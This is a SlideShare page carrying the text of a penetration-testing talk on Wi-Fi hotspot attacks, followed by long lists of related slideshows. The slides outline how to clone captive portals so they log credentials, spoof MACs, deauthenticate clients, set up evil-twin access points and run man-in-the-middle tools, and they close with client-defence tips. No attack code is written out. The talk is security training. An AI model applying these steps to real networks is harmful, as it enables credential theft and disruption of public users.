SlideShare a Scribd company logo

Wi-Fi Hotspot Attacks

Greg Foss
Greg Foss

Wireless technology is inherently insecure in general, however this presentation details some unconventional attacks that have been around for years but are still incredibly effective. Discussing the basics of AP cloning, abusing captive portals, and more.

Technology
1 of 73
Download to read offline
Wi-Fi Hacking for Web Pentesters Greg Foss Sr. Security Research Engineer @heinzarelli
Greg Foss Sr. Security Research Engineer OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, CYBER APT # whoami
*I am not liable for what you do with any of this information* Section 638:17 House Bill 495 - US rules against wireless hacking http://en.wikipedia.org/wiki/Legality_of_piggybacking#United_States
DISCLAIMER Not a ‘Wi-Fi Security Expert’ nor a Lawyer Just about everything I’m going to demonstrate is probably illegal, don’t do any of this against unauthorized targets…
Not Discussing Wi-Fi Security Basics • 802.11 • WEP Cracking - ridiculously easy, google it • WPA / WPA2 Attacks - Reaver • WPS Attacks - Reaver • PEAP, LEAP, etc. - Out of Scope
Agenda…
it’s everywhere… enough free WiFi that it’s almost not worth the time it takes to infiltrate unless free internet’s not the goal…
Bypassing is easy… • Sometimes Tor or a VPN will simply be allowed through the captive portal, no joke • Try appending ?.jpg or ?.png to the URL • Look for Open Redirect flaws, iFrames, etc. • Tunnel out over DNS! • Same tricks work if your ISP suspends your internet access, depending on the ISP of course…
Bypassing is easy… • On time-limited access points, just change your MAC when the time runs out. Or sniff MACs and ride on another’s paid access. • De-auth existing clients and/or DoS access points: • Aireplay-ng or Airdrop • http://www.aircrack-ng.org/ • MDK3 • https://forums.kali.org/showthread.php?19498- MDK3-Secret-Destruction-Mode
Bypassing is easy… • Sniff MAC Addresses and wait for a user to go idle, then modify your MAC and IP to match • Works on just about any open access point, especially captive portals • CPSCAM by Josh Wright will do this for you: • http://www.willhackforsushi.com/code/ cpscam.pl
Hijacking is also easy…
The Evil Twin… source: http://www.breakthesecurity.com/2014/04/evil-twin-attack-fake-wifi-hack.html
How to clone and weaponize captive portals 1. Connect to the access point and wait for the splash page to pop- up. 2. Close the splash page, and open your browser. Visit any random web page (http normally works better than https). 3. When the splash page comes up, save the entire landing page. Use the splash page and save additional pages as necessary. 4. Change the UA string and grab the mobile version as well if it exists. 5. Replace the form processor to write a log file and pass the client through to a legitimate landing page. 6. Modify the page HTML to point to your form processor and modify parameters as necessary. 7. Deploy the captive portal (will discuss this shortly) 8. Use IPTables to allow the victim’s MAC through to the internet using the form processor.
Mobile Cloning
Mobile Cloning • HTTrack: http://www.httrack.com/
Mobile Cloning • VT View Source:
 
 https://play.google.com/ store/apps/details? id=com.tozalakyan.view source&hl=en
How to Deauthenticate Clients and DoS Access Points • Aireplay-ng using the —deauth flag • file2air - deauth packet injection flood tool by Josh Wright • http://www.willhackforsushi.com/code/file2air/1.1/ file2air-1.1.tgz • Spoof AP MAC, send deauth requests to clients • Target a single user, all users, or AP itself • MDK3 Deauth Amok Mode to take out all WPA AP’s
How to Deauthenticate Clients and DoS Access Points source: https://github.com/sophron/wifiphisher
How to Deauthenticate Clients and DoS Access Points https://github.com/sophron/wifiphisher
source: https://www.isecpartners.com/blog/2013/july/man-in-the-middling-non-proxy-aware-wi-fi-devices-with-a-pineapple.aspx
Wi-Fi Pineapple https://wifipineapple.com/
Generic Splash Page Pineapple Configuration /etc/nodogsplash/htdocs/splash.html
Landing Page Pineapple Configuration - JavaScript Necessities /www/[directory]/index.html
PHP Form Processor Pineapple Configuration Easier than using IPTables /www/[directory]/auth/login.php
A word of caution w/ the Pineapple…
A word of caution w/ the Pineapple…
Existing Router Ideally one supporting guest mode…
DDWRT • Flash with DDWRT, then you can use NocatSplash to configure a captive portal. • Many other ways to go about this… DDWRT is just one of the easier options. • http://www.dd-wrt.com/site/index • http://sourceforge.net/projects/ nocatsplash/
Laptop Hotspot and/or Proxy
• Kali Linux • http://www.kali.org/ • Can do just about anything to connecting clients • Unlimited attack potential and plenty of drive space to build elaborate landing pages and believable scenarios Laptop Hotspot and/or Proxy
• Makes hacking Wi-Fi even easier! • https://github.com/SilverFoxx/PwnSTAR PwnStar - By SilverFoxx
Demo
Deploy Malware
Combine Pineapple portability with the versatility of Kali Linux • http://www.offensive-security.com/kali- linux/kali-linux-evil-wireless-access-point/
BeagleBone Black + Alfa Wi-Fi Card http://beagleboard.org/black http://www.alfa.com.tw/
BeagleBone AP Deployment Options get creative…
Going Mobile! • Nexus Device with Kali NetHunter • https://www.kali.org/kali-linux-nethunter/ • Pwnie Express Pwn Phone/Pad • https://www.pwnieexpress.com/product/ pwn-phone2014/
Going Mobile!
Going Mobile!
MITM Basic Tools • AirSSL • AirJack • Airsnarf • Dsniff • Cain • void11 • Ferret • SSLStrip • Wireshark • AirPwn • Ettercap • Etc…
You don’t even need to authenticate to attack clients
Fun with MITM • Snapception - https://github.com/thebradbain/ snapception • Love Thy Neighbors - http:// neighbor.willhackforsushi.com/ • AirPWN - http://airpwn.sourceforge.net/ Airpwn.html • Intercepter-NG - http://intercepter.nerf.ru/ • Many, many more…
Demo
Client Defense… • Always use a VPN/VPS/SSH Port Forwarding/ etc. when connected to an open access point. • Turn all Wireless devices off when traveling or in crowded areas, many devices still connect to wireless networks even when ‘sleeping’. • Hotspot not served up over HTTPS and other generally suspicious behavior. • Beware duplicate networks with different encryption.
Client Defense… • Use different login details and passwords for public wifi. Test false-credentials first, if it lets you through it’s not legit. • Turn off Wi-Fi on devices when traveling. • Exercise caution when connections suddenly drop, especially if it happens for everyone on the network. • If it just ‘doesn’t feel right’ then trust your instincts…
Resources • http://www.willhackforsushi.com/code/cpscam.pl • http://neighbor.willhackforsushi.com/ • http://www.aircrack-ng.org/ • http://www.dd-wrt.com/ • https://github.com/SilverFoxx/PwnSTAR • http://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point/ • http://beagleboard.org/black • http://www.armhf.com/boards/beaglebone-black/bbb-sd-install/ • http://grinninggecko.com/2013/09/13/kali-linux-on-headless-beaglebone-black-via- os-x/ • https://github.com/thebradbain/snapception • http://airpwn.sourceforge.net/Airpwn.html • http://intercepter.nerf.ru/
Thank You! Questions? https://github.com/gfoss/misc/Wireless/Captive-Portals/ Greg Foss
 Senior Security Research Engineer
 greg.foss[at]LogRhythm.com
 @heinzarelli

Recommended

WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack Proxy
Aditya Gupta
 
Web Hacking
Web HackingWeb Hacking
Web HackingInformation Technology
 
Pentesting Using Burp Suite
Pentesting Using Burp SuitePentesting Using Burp Suite
Pentesting Using Burp Suite
jasonhaddix
 
CISSP Prep: Ch 9. Software Development Security
CISSP Prep: Ch 9. Software Development SecurityCISSP Prep: Ch 9. Software Development Security
CISSP Prep: Ch 9. Software Development Security
Sam Bowne
 
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Sam Bowne
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
n|u - The Open Security Community
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?
btpsec
 

Recommended

WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack Proxy
Aditya Gupta
 
Web Hacking
Web HackingWeb Hacking
Web HackingInformation Technology
 
Pentesting Using Burp Suite
Pentesting Using Burp SuitePentesting Using Burp Suite
Pentesting Using Burp Suite
jasonhaddix
 
CISSP Prep: Ch 9. Software Development Security
CISSP Prep: Ch 9. Software Development SecurityCISSP Prep: Ch 9. Software Development Security
CISSP Prep: Ch 9. Software Development Security
Sam Bowne
 
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Sam Bowne
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
n|u - The Open Security Community
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?
btpsec
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
Andrew McNicol
 
Intrusion Detection Systems and Intrusion Prevention Systems
Intrusion Detection Systems and Intrusion Prevention Systems Intrusion Detection Systems and Intrusion Prevention Systems
Intrusion Detection Systems and Intrusion Prevention Systems
Cleverence Kombe
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
n|u - The Open Security Community
 
PHISHING DETECTION
PHISHING DETECTIONPHISHING DETECTION
PHISHING DETECTIONumme ayesha
 
WannaCry Ransomware
WannaCry Ransomware WannaCry Ransomware
WannaCry Ransomware
Zoho Corporation
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASPMarco Morana
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
Paul Melson
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017
HackerOne
 
Port scanning
Port scanningPort scanning
Port scanning
Hemanth Pasumarthi
 
Network Forensics
Network ForensicsNetwork Forensics
Network Forensics
primeteacher32
 
Malware analysis
Malware analysisMalware analysis
Malware analysisPrakashchand Suthar
 
Spoofing
SpoofingSpoofing
SpoofingSanjeev
 
SANS Digital Forensics and Incident Response Poster 2012
SANS Digital Forensics and Incident Response Poster 2012SANS Digital Forensics and Incident Response Poster 2012
SANS Digital Forensics and Incident Response Poster 2012
Rian Yulian
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
Threat Modelling
Threat ModellingThreat Modelling
Threat Modelling
n|u - The Open Security Community
 
Vapt pci dss methodology ppt v1.0
Vapt pci dss methodology ppt v1.0Vapt pci dss methodology ppt v1.0
Vapt pci dss methodology ppt v1.0
Network Intelligence India
 
Burp Suite Starter
Burp Suite StarterBurp Suite Starter
Burp Suite Starter
Fadi Abdulwahab
 
Ch 10: Hacking Web Servers
Ch 10: Hacking Web ServersCh 10: Hacking Web Servers
Ch 10: Hacking Web Servers
Sam Bowne
 
Malware ppt final.pptx
Malware ppt final.pptxMalware ppt final.pptx
Malware ppt final.pptx
LakshayNRReddy
 
Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics
Mohammed Adam
 
WiFi Pineapple - Alex R
WiFi Pineapple - Alex RWiFi Pineapple - Alex R
WiFi Pineapple - Alex RAlexander Rippee
 
Easy Tutorial Step-by-Step How to use Airolib-ng
Easy Tutorial Step-by-Step How to use Airolib-ngEasy Tutorial Step-by-Step How to use Airolib-ng
Easy Tutorial Step-by-Step How to use Airolib-ng
Tisya Ka
 

More Related Content

What's hot

Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
Andrew McNicol
 
Intrusion Detection Systems and Intrusion Prevention Systems
Intrusion Detection Systems and Intrusion Prevention Systems Intrusion Detection Systems and Intrusion Prevention Systems
Intrusion Detection Systems and Intrusion Prevention Systems
Cleverence Kombe
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
n|u - The Open Security Community
 
PHISHING DETECTION
PHISHING DETECTIONPHISHING DETECTION
PHISHING DETECTIONumme ayesha
 
WannaCry Ransomware
WannaCry Ransomware WannaCry Ransomware
WannaCry Ransomware
Zoho Corporation
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASPMarco Morana
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
Paul Melson
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017
HackerOne
 
Port scanning
Port scanningPort scanning
Port scanning
Hemanth Pasumarthi
 
Network Forensics
Network ForensicsNetwork Forensics
Network Forensics
primeteacher32
 
Spoofing
SpoofingSpoofing
SpoofingSanjeev
 
SANS Digital Forensics and Incident Response Poster 2012
SANS Digital Forensics and Incident Response Poster 2012SANS Digital Forensics and Incident Response Poster 2012
SANS Digital Forensics and Incident Response Poster 2012
Rian Yulian
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
Threat Modelling
Threat ModellingThreat Modelling
Threat Modelling
n|u - The Open Security Community
 
Vapt pci dss methodology ppt v1.0
Vapt pci dss methodology ppt v1.0Vapt pci dss methodology ppt v1.0
Vapt pci dss methodology ppt v1.0
Network Intelligence India
 
Burp Suite Starter
Burp Suite StarterBurp Suite Starter
Burp Suite Starter
Fadi Abdulwahab
 
Ch 10: Hacking Web Servers
Ch 10: Hacking Web ServersCh 10: Hacking Web Servers
Ch 10: Hacking Web Servers
Sam Bowne
 
Malware ppt final.pptx
Malware ppt final.pptxMalware ppt final.pptx
Malware ppt final.pptx
LakshayNRReddy
 
Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics
Mohammed Adam
 

What's hot (20)

Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
 
Intrusion Detection Systems and Intrusion Prevention Systems
Intrusion Detection Systems and Intrusion Prevention Systems Intrusion Detection Systems and Intrusion Prevention Systems
Intrusion Detection Systems and Intrusion Prevention Systems
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
 
PHISHING DETECTION
PHISHING DETECTIONPHISHING DETECTION
PHISHING DETECTION
 
WannaCry Ransomware
WannaCry Ransomware WannaCry Ransomware
WannaCry Ransomware
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASP
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017
 
Port scanning
Port scanningPort scanning
Port scanning
 
Network Forensics
Network ForensicsNetwork Forensics
Network Forensics
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Spoofing
SpoofingSpoofing
Spoofing
 
SANS Digital Forensics and Incident Response Poster 2012
SANS Digital Forensics and Incident Response Poster 2012SANS Digital Forensics and Incident Response Poster 2012
SANS Digital Forensics and Incident Response Poster 2012
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
Threat Modelling
Threat ModellingThreat Modelling
Threat Modelling
 
Vapt pci dss methodology ppt v1.0
Vapt pci dss methodology ppt v1.0Vapt pci dss methodology ppt v1.0
Vapt pci dss methodology ppt v1.0
 
Burp Suite Starter
Burp Suite StarterBurp Suite Starter
Burp Suite Starter
 
Ch 10: Hacking Web Servers
Ch 10: Hacking Web ServersCh 10: Hacking Web Servers
Ch 10: Hacking Web Servers
 
Malware ppt final.pptx
Malware ppt final.pptxMalware ppt final.pptx
Malware ppt final.pptx
 
Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics
 

Viewers also liked

Easy Tutorial Step-by-Step How to use Airolib-ng
Easy Tutorial Step-by-Step How to use Airolib-ngEasy Tutorial Step-by-Step How to use Airolib-ng
Easy Tutorial Step-by-Step How to use Airolib-ng
Tisya Ka
 
Activated Charcoal - Making Sense of Endpoint Data
Activated Charcoal - Making Sense of Endpoint DataActivated Charcoal - Making Sense of Endpoint Data
Activated Charcoal - Making Sense of Endpoint Data
Greg Foss
 
Caffe Latte Attack Presented In Toorcon
Caffe Latte Attack Presented In ToorconCaffe Latte Attack Presented In Toorcon
Caffe Latte Attack Presented In Toorcon
Md Sohail Ahmad
 
The Hacker News: Hacking Wireless DSL routers via Admin Panel Password Reset ...
The Hacker News: Hacking Wireless DSL routers via Admin Panel Password Reset ...The Hacker News: Hacking Wireless DSL routers via Admin Panel Password Reset ...
The Hacker News: Hacking Wireless DSL routers via Admin Panel Password Reset ...
The Hacker News
 
Wireless router
Wireless routerWireless router
Wireless routerroza921
 
Threat Intelligence Field of Dreams
Threat Intelligence Field of DreamsThreat Intelligence Field of Dreams
Threat Intelligence Field of Dreams
Greg Foss
 
SecureSet WarGames - Logging and Packet Capture Training
SecureSet WarGames - Logging and Packet Capture TrainingSecureSet WarGames - Logging and Packet Capture Training
SecureSet WarGames - Logging and Packet Capture Training
Greg Foss
 
Setting hotspot-web-proxy-mikrotik
Setting hotspot-web-proxy-mikrotikSetting hotspot-web-proxy-mikrotik
Setting hotspot-web-proxy-mikrotik
wayan abyong
 
Configuring linksys wireless router
Configuring linksys wireless routerConfiguring linksys wireless router
Configuring linksys wireless router
anku3
 
DerbyCon 5 - Tactical Diversion-Driven Defense
DerbyCon 5 - Tactical Diversion-Driven DefenseDerbyCon 5 - Tactical Diversion-Driven Defense
DerbyCon 5 - Tactical Diversion-Driven Defense
Greg Foss
 
Deception Driven Defense - Infragard 2016
Deception Driven Defense - Infragard 2016Deception Driven Defense - Infragard 2016
Deception Driven Defense - Infragard 2016
Greg Foss
 
Wireless Cracking using Kali
Wireless Cracking using KaliWireless Cracking using Kali
Wireless Cracking using Kali
n|u - The Open Security Community
 
Caffe Latte Attack
Caffe Latte AttackCaffe Latte Attack
Caffe Latte Attack
AirTight Networks
 
Metasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-LtdMetasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-LtdAli Hussain
 
Informationssicherheit im Übersetzungsprozess
Informationssicherheit im ÜbersetzungsprozessInformationssicherheit im Übersetzungsprozess
Informationssicherheit im Übersetzungsprozess
Hans Pich
 
Static PIE, How and Why - Metasploit's new POSIX payload: Mettle
Static PIE, How and Why - Metasploit's new POSIX payload: MettleStatic PIE, How and Why - Metasploit's new POSIX payload: Mettle
Static PIE, How and Why - Metasploit's new POSIX payload: Mettle
Brent Cook
 
Webinar Metasploit Framework - Academia Clavis
Webinar Metasploit Framework - Academia ClavisWebinar Metasploit Framework - Academia Clavis
Webinar Metasploit Framework - Academia Clavis
Clavis Segurança da Informação
 

Viewers also liked (20)

WiFi Pineapple - Alex R
WiFi Pineapple - Alex RWiFi Pineapple - Alex R
WiFi Pineapple - Alex R
 
Easy Tutorial Step-by-Step How to use Airolib-ng
Easy Tutorial Step-by-Step How to use Airolib-ngEasy Tutorial Step-by-Step How to use Airolib-ng
Easy Tutorial Step-by-Step How to use Airolib-ng
 
Activated Charcoal - Making Sense of Endpoint Data
Activated Charcoal - Making Sense of Endpoint DataActivated Charcoal - Making Sense of Endpoint Data
Activated Charcoal - Making Sense of Endpoint Data
 
Caffe Latte Attack Presented In Toorcon
Caffe Latte Attack Presented In ToorconCaffe Latte Attack Presented In Toorcon
Caffe Latte Attack Presented In Toorcon
 
The Hacker News: Hacking Wireless DSL routers via Admin Panel Password Reset ...
The Hacker News: Hacking Wireless DSL routers via Admin Panel Password Reset ...The Hacker News: Hacking Wireless DSL routers via Admin Panel Password Reset ...
The Hacker News: Hacking Wireless DSL routers via Admin Panel Password Reset ...
 
Wireless router
Wireless routerWireless router
Wireless router
 
Threat Intelligence Field of Dreams
Threat Intelligence Field of DreamsThreat Intelligence Field of Dreams
Threat Intelligence Field of Dreams
 
SecureSet WarGames - Logging and Packet Capture Training
SecureSet WarGames - Logging and Packet Capture TrainingSecureSet WarGames - Logging and Packet Capture Training
SecureSet WarGames - Logging and Packet Capture Training
 
Setting hotspot-web-proxy-mikrotik
Setting hotspot-web-proxy-mikrotikSetting hotspot-web-proxy-mikrotik
Setting hotspot-web-proxy-mikrotik
 
Configuring linksys wireless router
Configuring linksys wireless routerConfiguring linksys wireless router
Configuring linksys wireless router
 
DerbyCon 5 - Tactical Diversion-Driven Defense
DerbyCon 5 - Tactical Diversion-Driven DefenseDerbyCon 5 - Tactical Diversion-Driven Defense
DerbyCon 5 - Tactical Diversion-Driven Defense
 
Deception Driven Defense - Infragard 2016
Deception Driven Defense - Infragard 2016Deception Driven Defense - Infragard 2016
Deception Driven Defense - Infragard 2016
 
Wireless Cracking using Kali
Wireless Cracking using KaliWireless Cracking using Kali
Wireless Cracking using Kali
 
Caffe Latte Attack
Caffe Latte AttackCaffe Latte Attack
Caffe Latte Attack
 
Metasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-LtdMetasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-Ltd
 
Penetration test
Penetration testPenetration test
Penetration test
 
Informationssicherheit im Übersetzungsprozess
Informationssicherheit im ÜbersetzungsprozessInformationssicherheit im Übersetzungsprozess
Informationssicherheit im Übersetzungsprozess
 
Tranning-2
Tranning-2Tranning-2
Tranning-2
 
Static PIE, How and Why - Metasploit's new POSIX payload: Mettle
Static PIE, How and Why - Metasploit's new POSIX payload: MettleStatic PIE, How and Why - Metasploit's new POSIX payload: Mettle
Static PIE, How and Why - Metasploit's new POSIX payload: Mettle
 
Webinar Metasploit Framework - Academia Clavis
Webinar Metasploit Framework - Academia ClavisWebinar Metasploit Framework - Academia Clavis
Webinar Metasploit Framework - Academia Clavis
 

Similar to Wi-Fi Hotspot Attacks

Adventures with Podman and Varlink
Adventures with Podman and VarlinkAdventures with Podman and Varlink
Adventures with Podman and Varlink
Jeremy Brown
 
What is being exposed from IoT Devices
What is being exposed from IoT DevicesWhat is being exposed from IoT Devices
What is being exposed from IoT Devices
The Security of Things Forum
 
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Zoltan Balazs
 
Android Penetration Testing - Day 3
Android Penetration Testing - Day 3Android Penetration Testing - Day 3
Android Penetration Testing - Day 3
Mohammed Adam
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 
Using Blockchain to Increase Supply Chain Transparency
Using Blockchain to Increase Supply Chain TransparencyUsing Blockchain to Increase Supply Chain Transparency
Using Blockchain to Increase Supply Chain Transparency
Horea Porutiu
 
IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?
Zoltan Balazs
 
Honeypots for Active Defense
Honeypots for Active DefenseHoneypots for Active Defense
Honeypots for Active Defense
Greg Foss
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
Zoltan Balazs
 
Encode polkadot club
Encode polkadot club Encode polkadot club
Encode polkadot club
Vanessa Lošić
 
iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWebiThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
Jie Liau
 
Red Team Apocalypse
Red Team ApocalypseRed Team Apocalypse
Red Team Apocalypse
Beau Bullock
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror Stories
EC-Council
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
EC-Council
 
MNSEC 2018 - Observations from the APNIC Community Honeynet Project
MNSEC 2018 - Observations from the APNIC Community Honeynet Project MNSEC 2018 - Observations from the APNIC Community Honeynet Project
MNSEC 2018 - Observations from the APNIC Community Honeynet Project
MNCERT
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedfangjiafu
 
The Internet of Things: We've Got to Chat
The Internet of Things: We've Got to ChatThe Internet of Things: We've Got to Chat
The Internet of Things: We've Got to Chat
Duo Security
 
Personal Internet Security Practice
Personal Internet Security PracticePersonal Internet Security Practice
Personal Internet Security Practice
Brian Pichman
 
IoT_and_the_Impact_on_Security_Brian_Knopf_ISSA-OC_July-2014
IoT_and_the_Impact_on_Security_Brian_Knopf_ISSA-OC_July-2014IoT_and_the_Impact_on_Security_Brian_Knopf_ISSA-OC_July-2014
IoT_and_the_Impact_on_Security_Brian_Knopf_ISSA-OC_July-2014Brian Knopf
 
Pichman privacy, the dark web, & hacker devices i school (1)
Pichman privacy, the dark web, & hacker devices i school (1)Pichman privacy, the dark web, & hacker devices i school (1)
Pichman privacy, the dark web, & hacker devices i school (1)
Stephen Abram
 

Similar to Wi-Fi Hotspot Attacks (20)

Adventures with Podman and Varlink
Adventures with Podman and VarlinkAdventures with Podman and Varlink
Adventures with Podman and Varlink
 
What is being exposed from IoT Devices
What is being exposed from IoT DevicesWhat is being exposed from IoT Devices
What is being exposed from IoT Devices
 
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
 
Android Penetration Testing - Day 3
Android Penetration Testing - Day 3Android Penetration Testing - Day 3
Android Penetration Testing - Day 3
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
Using Blockchain to Increase Supply Chain Transparency
Using Blockchain to Increase Supply Chain TransparencyUsing Blockchain to Increase Supply Chain Transparency
Using Blockchain to Increase Supply Chain Transparency
 
IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?
 
Honeypots for Active Defense
Honeypots for Active DefenseHoneypots for Active Defense
Honeypots for Active Defense
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
 
Encode polkadot club
Encode polkadot club Encode polkadot club
Encode polkadot club
 
iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWebiThome_CYBERSEC2024_Drive_Into_the_DarkWeb
iThome_CYBERSEC2024_Drive_Into_the_DarkWeb
 
Red Team Apocalypse
Red Team ApocalypseRed Team Apocalypse
Red Team Apocalypse
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror Stories
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
 
MNSEC 2018 - Observations from the APNIC Community Honeynet Project
MNSEC 2018 - Observations from the APNIC Community Honeynet Project MNSEC 2018 - Observations from the APNIC Community Honeynet Project
MNSEC 2018 - Observations from the APNIC Community Honeynet Project
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
 
The Internet of Things: We've Got to Chat
The Internet of Things: We've Got to ChatThe Internet of Things: We've Got to Chat
The Internet of Things: We've Got to Chat
 
Personal Internet Security Practice
Personal Internet Security PracticePersonal Internet Security Practice
Personal Internet Security Practice
 
IoT_and_the_Impact_on_Security_Brian_Knopf_ISSA-OC_July-2014
IoT_and_the_Impact_on_Security_Brian_Knopf_ISSA-OC_July-2014IoT_and_the_Impact_on_Security_Brian_Knopf_ISSA-OC_July-2014
IoT_and_the_Impact_on_Security_Brian_Knopf_ISSA-OC_July-2014
 
Pichman privacy, the dark web, & hacker devices i school (1)
Pichman privacy, the dark web, & hacker devices i school (1)Pichman privacy, the dark web, & hacker devices i school (1)
Pichman privacy, the dark web, & hacker devices i school (1)
 

More from Greg Foss

Cloud Crime Ops
Cloud Crime OpsCloud Crime Ops
Cloud Crime Ops
Greg Foss
 
Future of Destructive Malware
Future of Destructive MalwareFuture of Destructive Malware
Future of Destructive Malware
Greg Foss
 
Crypto Hacks - Quit your Job and Become a Crypto Farmer
Crypto Hacks - Quit your Job and Become a Crypto FarmerCrypto Hacks - Quit your Job and Become a Crypto Farmer
Crypto Hacks - Quit your Job and Become a Crypto Farmer
Greg Foss
 
